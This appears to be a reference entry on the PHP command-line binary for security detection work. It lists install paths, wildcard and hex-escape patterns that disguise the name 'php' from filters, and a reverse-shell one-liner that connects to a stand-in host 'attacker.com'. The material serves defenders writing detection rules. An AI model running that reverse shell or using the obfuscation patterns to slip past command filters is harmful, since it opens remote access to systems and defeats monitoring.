php
PHP CLI interpreter. Can execute arbitrary PHP code, spawn reverse shells, read/write files, and make network connections.
Binary Paths
/usr/bin/php/usr/bin/php8/usr/bin/php7/bin/php
Glob Patterns
| Pattern | Notes |
|---|---|
p?p
|
Single wildcard replaces 'h' — note: may also match pip; use full path or longer glob to disambiguate |
ph?
|
Wildcard replaces 'p' suffix |
p[h]p
|
Character class around 'h' |
/usr/bin/p?p
|
Full path wildcard — more precise than bare p?p |
/???/bin/p?p
|
Obfuscate both /usr/ and the 'h' in php |
$(ls /usr/bin/p?p)
|
ls resolves glob to /usr/bin/php; command substitution executes it |
$'\x70\x68\x70'
|
ANSI-C hex escapes expand to 'php' |
Pattern Tester
$
Try typing php or a full path like /usr/bin/php
YARA Rule
Auto-generated detection rule for php
Platform Notes
PHP reverse shell one-liner: php -r '$sock=fsockopen("attacker.com",4444);exec("/bin/sh -i <&3 >&3 2>&3");'. The CLI binary may be versioned (php8, php7.4) — adjust glob accordingly.